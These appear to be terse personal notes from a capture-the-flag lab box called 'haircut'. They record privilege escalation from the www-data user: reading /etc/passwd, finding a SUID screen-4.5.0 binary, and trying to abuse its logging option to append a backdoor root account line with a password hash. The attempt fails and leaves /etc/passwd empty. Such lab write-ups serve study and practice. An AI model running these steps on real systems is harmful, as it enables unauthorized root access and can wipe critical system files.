3 box enum www-data
www-data@haircut:~/html/uploads$ cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
maria:x:1000:1000:maria,,,:/home/maria:/bin/bash
SuidEnum
[~] Custom SUID Binaries (Interesting Stuff)
------------------------------
/usr/bin/screen-4.5.0
------------------------------
www-data@haircut:~/html/uploads$ screen --version
Screen version 4.05.00 (GNU) 10-Dec-16
https://gtfobins.github.io/gtfobins/screen/
# need to set xterm
LFILE="/etc/passwd"
/usr/bin/screen-4.5.0 -L $LFILE echo "kashz:cAZZtf3ncxRAY:0:0:root:/root:/bin/bash"
ERROR => getpwuid() can't identify your account!
www-data@haircut:~/html/uploads$ file /etc/passwd
/etc/passwd: empty
# it is not appending
Last updated